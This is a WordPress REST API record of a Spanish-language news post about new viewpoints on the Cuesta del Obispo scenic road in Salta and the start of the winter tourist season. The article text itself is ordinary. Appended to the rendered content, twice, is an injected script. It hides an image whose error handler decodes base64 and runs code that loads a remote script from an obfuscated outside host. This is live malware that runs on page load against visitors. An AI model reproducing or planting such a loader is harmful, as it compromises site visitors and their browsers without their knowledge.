{"id":2846,"date":"2023-07-13T09:40:33","date_gmt":"2023-07-13T12:40:33","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2846"},"modified":"2025-08-14T00:12:53","modified_gmt":"2025-08-14T03:12:53","slug":"la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2846","title":{"rendered":"La temporada tur\u00edstica invernal inici\u00f3 con la inauguraci\u00f3n de infraestructura en la Cuesta del Obispo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7e0423\"><em>Se inauguraron los nuevos miradores ubicados en la ruta esc\u00e9nica 33, pleno coraz\u00f3n de la Cuesta del Obispo a 3240 metros sobre el nivel del mar.<\/em><\/h3>\n\n\n\n<p>El vicegobernador&nbsp;<strong>Antonio Marocco<\/strong>&nbsp;junto al ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>, intendentes y referentes del sector privado inauguraron la obra y recibieron a los primeros turistas de la temporada.<\/p>\n\n\n\n<p>Con la presencia de autoridades nacionales y provinciales se inauguraron&nbsp;los nuevos miradores ubicados en la ruta esc\u00e9nica 33, pleno coraz\u00f3n de la Cuesta del Obispo a 3240 metros sobre el nivel del mar. Las obras se ejecutaron a trav\u00e9s del Programa de Inversi\u00f3n 50 Destinos; adem\u00e1s, se realiz\u00f3 el acto de recepci\u00f3n del Primer Turista de la temporada de invierno.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7955-la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7955-la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo.jpg\" alt=\"La temporada tur\u00edstica invernal inicio con la inauguraci\u00f3n de infraestructura en la Cuesta del Obispo\" width=\"298\" height=\"199\"\/><\/a><\/figure><\/div>\n\n\n<p>La familia Tobares, de C\u00f3rdoba, fue sorprendida por la recepci\u00f3n, Gast\u00f3n, Marina y las peque\u00f1as Luj\u00e1n y Camila acompa\u00f1ados por Julieta Toledo llegaron desde C\u00f3rdoba atra\u00eddos por las bellezas naturales y la cultura de Salta. La familia Tobares fue declarada hu\u00e9sped de honor por el Ministerio de Turismo y Deportes. Al recibir el diploma Marina expres\u00f3: \u201cnos recibieron con un gran cari\u00f1o, es como dicen en Salta que es tan linda que enamora; vamos a invitar a todos a que se sumen a conocer esta hermosa provincia\u201d.<\/p>\n\n\n\n<p>En la oportunidad, el vicegobernador Antonio Marocco transmiti\u00f3 los saludos del gobernador Gustavo S\u00e1enz y destac\u00f3 la belleza del parador, un logro al que se llega por la articulaci\u00f3n Naci\u00f3n, Provincia y Municipio y asegur\u00f3: \u00abSalta tiene turismo todo el a\u00f1o, conjuga con la cultura, el folclore y la historia\u00bb.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7956-la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7956-la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo.jpg\" alt=\"La temporada tur\u00edstica invernal inicio con la inauguraci\u00f3n de infraestructura en la Cuesta del Obispo\" width=\"341\" height=\"227\"\/><\/a><\/figure><\/div>\n\n\n<p>Por su parte, el ministro de Turismo y Deportes Mario Pe\u00f1a indic\u00f3: \u201cEn nombre de ustedes, les damos la bienvenida a todos los turistas. Gracias por elegir Salta\u201d y se\u00f1al\u00f3 que el Gobierno Provincial junto al equipo de Naci\u00f3n y a las intendencias se trabaja de manera conjunta y agreg\u00f3 que \u201cla puesta en valor de este espacio para el Mirador es una apuesta al desarrollo que genera el turismo, que es trabajo para todos los salte\u00f1os y una mejor calidad de vida\u201d.<\/p>\n\n\n\n<p>En tanto, Eugenia Benedetti, Subsecretaria de Desarrollo Estrat\u00e9gico del Ministerio de Turismo y Deportes de la Naci\u00f3n destac\u00f3 la importancia tur\u00edstica de Salta por el importante n\u00famero de visitantes que recibe y remarc\u00f3 que fue el principal destino en el programa Previaje 4.<\/p>\n\n\n\n<p>En cuanto al Programa 50 destinos, la funcionaria nacional explic\u00f3 que es un programa que permite la realizaci\u00f3n de obras para potenciar el turismo e inform\u00f3 que en la Ruta Esc\u00e9nica de los Valles se encuentran en ejecuci\u00f3n los Miradores Mal Paso, Pe\u00f1a Caracol y El Balc\u00f3n con una inversi\u00f3n de m\u00e1s de 50 millones.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7957-la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7957-la-temporada-turistica-invernal-inicio-con-la-inauguracion-de-infraestructura-en-la-cuesta-del-obispo.jpg\" alt=\"La temporada tur\u00edstica invernal inicio con la inauguraci\u00f3n de infraestructura en la Cuesta del Obispo\" width=\"301\" height=\"201\"\/><\/a><\/figure><\/div>\n\n\n<p>El evento cont\u00f3 con la participaci\u00f3n de Alma Carpera y de la Academia de Danzas Folcl\u00f3ricas Campo Alegre de Chicoana, asimismo se degustaron de vinos de la zona, tamales de Julia Ortega, Campeona de campeonas de la delicia Regional; Gloria Aguirre Ganador Provincial del Concurso de la Empanada 2022 y oriunda de Chicoana.<\/p>\n\n\n\n<p>Estuvieron presentes los intendentes Esteban Ivetich de Chicoana y Am\u00e9rico Liendro de Cachi; la secretaria de Turismo Nadia Loza y los subsecretarios de Desarrollo y Competitividad Tur\u00edstica , Alejandro Usandivaras y de Promoci\u00f3n Laura Alcorta, respectivamente; asimismo, la directora General De Desarrollo de Destinos Tur\u00edsticos de Soledad Issa, el presidente de la C\u00e1mara de Turismo Juan Lucero, el intendente del Parque Nacional Los Cardones\u00a0\u00a0 \u00a0 Emilio Daher, el director Regi\u00f3n Norte Parque Nacional Sergio Valdecantos.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"La temporada tur\u00edstica invernal inici\u00f3 con la inauguraci\u00f3n de infraestructura en la Cuesta de Obispo\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/QWZ8uLNgXbc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><br>\u00a0<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se inauguraron los nuevos miradores ubicados en la ruta esc\u00e9nica 33, pleno coraz\u00f3n de la Cuesta del Obispo a 3240 metros sobre el nivel del mar. El vicegobernador&nbsp;Antonio Marocco&nbsp;junto al ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a, intendentes y referentes del sector privado inauguraron la obra y recibieron a los primeros turistas de la temporada. Con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2847,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[4,18],"tags":[],"class_list":{"0":"post-2846","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-paisajes","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2846"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2846"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2846\/revisions"}],"predecessor-version":[{"id":7027,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2846\/revisions\/7027"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2847"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2846"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2846"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2846"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}